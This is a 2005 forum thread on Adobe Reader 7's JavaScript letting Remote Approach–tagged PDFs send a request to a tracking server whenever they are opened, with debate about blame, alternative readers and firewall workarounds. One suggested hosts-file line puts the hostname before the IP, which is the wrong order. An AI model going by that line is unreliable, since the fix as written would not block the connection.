A New Approach
April 13, 2005 9:06 AM   Subscribe

Unexpected Features in Acrobat 7: A company called Remote Approach offers a feature to PDF authors to allow them to track the dissemination of their documents. Linux Weekly News reports, "After doing a little research, we found that Adobe's Reader was connecting to http://www.remoteapproach.com/remoteapproach/logging.asp each time we opened the document."
posted by knave (35 comments total)
 
To those who don't want this: your software firewall can prevent connections to this site, or you can add a line to your "hosts" file:

remoteapproach.com 127.0.0.1
posted by orthogonality at 9:15 AM on April 13, 2005


Or...jump off the eternal wheel of upgrades.
posted by gimonca at 9:21 AM on April 13, 2005


Adobe products... now with more spyware, because you know you want it!
posted by clevershark at 9:26 AM on April 13, 2005


Why do they always have to fuck up a perfectly good thing?
posted by fungible at 9:27 AM on April 13, 2005


RTFA.

What many Linux users may not have realized, since Adobe did not release an Acrobat Reader 6.x for Linux, is that Adobe has added JavaScript support to PDF and the official Acrobat readers since Acrobat 6.x. For those interested in the JavaScript support and its abilities in Acrobat, see Adobe's scripting reference or scripting guide. (Both are PDFs, of course.)

By default, Adobe Reader 7 turns on JavaScript, so the "tagged" document is able to "phone home" without the user's awareness. Turning off JavaScript disables the document's code, and prevents Remote Approach (or any other entity) from tracking views of the document. No doubt, Remote Approach is using features that would normally be used to submit information from a PDF form.


I'm not thrilled at all about Adobe going the Microsoft route with scritping available for anyone who wants to add malicious code to a pdf document. That's bad enough without hyperbole about spyware confusing the actual issue.
posted by ursus_comiter at 9:44 AM on April 13, 2005


Is this a feature in any way related to Adobe's actions, or is it a 3rd-party plugin? Seems similar to blaming Microsoft for allowing images in emails (which allow the same sort of tracking).
posted by thedevildancedlightly at 9:45 AM on April 13, 2005


See ursus_comiter for my thoughts - this isn' t a problem with Adobe, but with the nature of the interactive internet.
posted by thedevildancedlightly at 9:46 AM on April 13, 2005


Why do they always have to fuck up a perfectly good thing?

People can get schizophrenic when it comes to dealing with their web users/customers.

For instance, they hate spam but won't see anything wrong about mass-mailing potential customers. Others will never give their own private information to a website but will still insist on collecting private data from their visitors. They can see why it's bad for them but for some reason are unable to understand that their users/customers feel the same. Every time I discuss this matter with them I realize that they just don't connect the dots.

- "I want visitors to give their name, address, phone number and email so that I know who they are, and it must be mandatory"
- "Have you ever visited a website where this was mandatory? Would you like it?"
- "Uh, no"

Pet peeve: academics who are using other academics' data and figures (found on the internet) for their Powerpoint presentations and who keep asking me how to prevent their own on-line data and figures from being "stolen", for instance by making PDF printing impossible.

I guess these are potential customers for a service such as Remote Approach.
posted by elgilito at 10:16 AM on April 13, 2005


another good reason to use Preview in Mac OSX to view PDFs
posted by slogger at 10:21 AM on April 13, 2005


I uninstalled Adobe Reader on every machine I use and switched to this tiny, free application. I've opened dozens of PDFs from different sources since then and never had a problem with them, and it loads in an instant.
posted by nev at 10:23 AM on April 13, 2005


(That's Windows-only, though.)
posted by nev at 10:24 AM on April 13, 2005


nev writes "I uninstalled Adobe Reader on every machine I use and switched to this tiny, free application."

I haven't tried this yet, but it's got the best EULA I've ever seen. Even better that the GPL EULAs, if not in terms of what it allows, in its simplicity.
posted by orthogonality at 10:27 AM on April 13, 2005


This is exactly what my company has been looking for. Thanks a bunch for making me the star today!
posted by fenriq at 10:31 AM on April 13, 2005


Sigh....

They added Javascript people... Which in a perfect world is really a pretty cool addition.

The ability to make look alike paper forms interactive, so that a user can fill them out, get some validation, and then print them all from a locally saved document is a nice feature for alot of folks.

So yes, some douchebag took those capabilities and built a webbug with it.

Welcome to world of tomorrow.
posted by PissOnYourParade at 10:37 AM on April 13, 2005


Dang it Adobe, as if the size-bloat of Acrobat wasn't bad enough, this sucks. Still, there seems to be enough goodness in Tiger's improved PDF support to keep me happy for a while. I just want the 29th April to be here now!
posted by TheDonF at 10:38 AM on April 13, 2005


Nice, elegant workaround orthogonality.
posted by caddis at 10:42 AM on April 13, 2005


nev-thanks for that.
posted by OmieWise at 10:51 AM on April 13, 2005


There's also an alternative to PDF , it's called DJVU originally developed by AT&T Research Labs (cool techies over there) now owned by a company (sending a safety message to corporate) but decoder/reader is open source. There's no excuse for "there's no alternative" choosing of PDF anymore, sorry.

Yes, you have to work !!
posted by elpapacito at 11:16 AM on April 13, 2005


Tempest in a teapot.

Folks, this isn't Adobe's fault. All they did was implement a subset of Javascript to allow greater interactivity on their forms (which, IMHO, is a good thing). This "tracking" feature is not implemented by Adobe, but by a 3rd Party who wants you to upload your documents to them so they can "modify" them by adding a "phone home" Javascript and then send them back to you. From a technical standpoint, this should be simple to implement via an onOpen() (or whatever the actual method is).

Blaming Adobe for this is like blaming W3C for script vulnerabilities in Mozilla.

The issue here, IMHO, is that a company is asking people to pay them for the right to modify their documents and track its usage.
posted by mkultra at 11:20 AM on April 13, 2005


Blaming Adobe for this is like blaming W3C for script vulnerabilities in Mozilla.

Actually, it's like blaming Mozilla for script vulnerabilities in Mozilla.
posted by grouse at 12:02 PM on April 13, 2005


Why do they always have to fuck up a perfectly good thing?

Personally, I've never liked Acrobat, and this is just another nail in the coffin (note: the coffin has a lot of nails already). We come from two different worlds, my friend.
posted by Hildago at 12:05 PM on April 13, 2005


Actually, it's like blaming Mozilla for script vulnerabilities in Mozilla.

OK, bad analogy, but I still fail to see how this is due to some evil on Adobe's part, or even some tragic flaw in the software.
posted by mkultra at 12:11 PM on April 13, 2005


I like the foxit software, but couldn't print from TurboTax Online with it and had to install Adobe Reader anyway :/
posted by Foosnark at 12:35 PM on April 13, 2005


mkultra because people (OK I) don't expect a document viewer to have scripting capabilities. And I don't expect a document reader to be a web browser unless it's advertised that way. This is going to be quite the support paradigm shift if this is easily exploitable just like when mail went from safe -> safe as long as you didn't open -> even just previewing the wrong message can totally hose your system if you haven't patched since the last exploit.
posted by Mitheral at 1:06 PM on April 13, 2005


Geez and when you turn scripting off acrobat asks you to turn it back on at every exit, warning that the document may not rendered correctly even if you didn't have any document open. Now that's evil.
posted by Mitheral at 1:15 PM on April 13, 2005


See ursus_comiter for my thoughts - this isn' t a problem with Adobe, but with the nature of the interactive internet.

RTFC. The problem appears to be that Adobe has decided to add an insecure default setting for Javascript in PDF document, as ursus_comiter has pointed out.
posted by clevershark at 1:22 PM on April 13, 2005


Mitheral writes "Geez and when you turn scripting off acrobat asks you to turn it back on at every exit, warning that the document may not rendered correctly even if you didn't have any document open. Now that's evil."

There's a windows patch that gets rid of the box asking you to turn javascript back on. I saw it on Slashdot, I think, or of course you can google for it.
posted by orthogonality at 1:25 PM on April 13, 2005


Anyone know if Adobe Reader on OS/X uses Apple's Webkit for HTTP requests? Or goes via the standard defined proxy server?

(If so: Adobe, meet privoxy.)
posted by cstross at 2:09 PM on April 13, 2005


Big big thanks nev, this pdf reader is a gem. It loads and run several magnitude faster than the bloated original, I stopped at its 6th version, but the loading time of it was already nearing grotesque, even longer than Photoshop CS behemoth. I can even remember giving up on the loading of a pdf, killing the task.
A lost for Adobe, a win for the PDF format.
posted by denpo at 2:17 PM on April 13, 2005


Folks, this isn't Adobe's fault. All they did was implement a subset of Javascript to allow greater interactivity on their forms (which, IMHO, is a good thing).

Are you serious? You honestly don't see how allowing PDFs to do things like connect to remote servers is boneheaded? Do you think a PDF should be able to read and write arbitrary files, too?

They could have easily designed it to pop up a window asking, "Do you want to allow this document to connect to blah.blah.com?" once per document by default, with a preference option to give a default answer rather than ask the question every time. I would have thought anyone who was alive and had access to the Internet in 2005 would understand the need for this.

It absolutely is incumbent upon application programmers to anticipate these sorts of obvious problems with any new functionality that is added. I like to imagine that someone at Adobe raised this issue and suggested something more-or-less like what I suggested, but was shot down by someone in marketing.
posted by dreish at 2:27 PM on April 13, 2005


Thanks to both orthogonality and nev. This is a terribly useful discussion.
posted by ontic at 2:45 PM on April 13, 2005


orthogonality's approach only works as long as (a) Remote Approach uses that hostname exclusively (instead of, say, pdf.remoteapproach.com) and (b) no one else whips up a script in their PDFs that does the same thing to their servers. The comments to the original article discuss this in great detail. It's a wallpaper fix that doesn't solve the real problem (sorry).

A better approach (in Linux) is to use iptables to deny outbound connections from acroread. Don't know how you would do such a thing in Windows.
posted by elvolio at 4:22 PM on April 13, 2005


elvolio writes "A better approach (in Linux) is to use iptables to deny outbound connections from acroread. Don't know how you would do such a thing in Windows."

elvolio is absolutely right, the host tables approach is brittle.

That's why I mentioned software firewalls first ;)

Basically, with a windows software firewall, you can deny outbound connections from acroread, just as elvolio suggests doing under linux.

For instance, my software firewall (kerio -- highly recommended and free for personal use) is set to ask me on all outbound connections except for my HTML proxy, and I specifically disallow outbound connections from my mail reader to anywhere except my mail server, and only then on ports 25 and 110. This means that if I get spam with webbugs (basically any image that isn't included in the email itself) those are not loaded, so the spammer doesn't learn I got the message at all.

So yes, deny outbound connection for acroread, but do it by only allowing outbound connections where those connections are actually doing you some good, and deny (or have the software firewall ask permission for) all others.

(I have no idea, for instance, why Microsoft's mouse driver software likes to "phone home" every week or so, but I also know that it doesn't get to complete that connection from my machine.)
posted by orthogonality at 4:40 PM on April 13, 2005


dreish- That's true, it ought to have a permission box. And I'm certainly with you that this lame attempt at "DRM" is pretty horrendous. But, the ability to deliver an offline interactive form that can, in turn, deliver results to a centralized database is still, IMHO, a good thing. What I've found about Adobe's "advanced" (read: non-standard) PDF features is that they tend to degrade nicely, allowing other PDF display engines to still render the static content correctly, only without the bells and whistles.
posted by mkultra at 6:35 PM on April 13, 2005


The FOXIT thing just loads heaps faster than Acrobloat. That alone is worth the change, never mind the javascript thing...... Woot!
posted by Merlin at 12:44 AM on April 14, 2005


« Older Who were your first ancestors   |   The Red Piano Newer »


This thread has been archived and is closed to new comments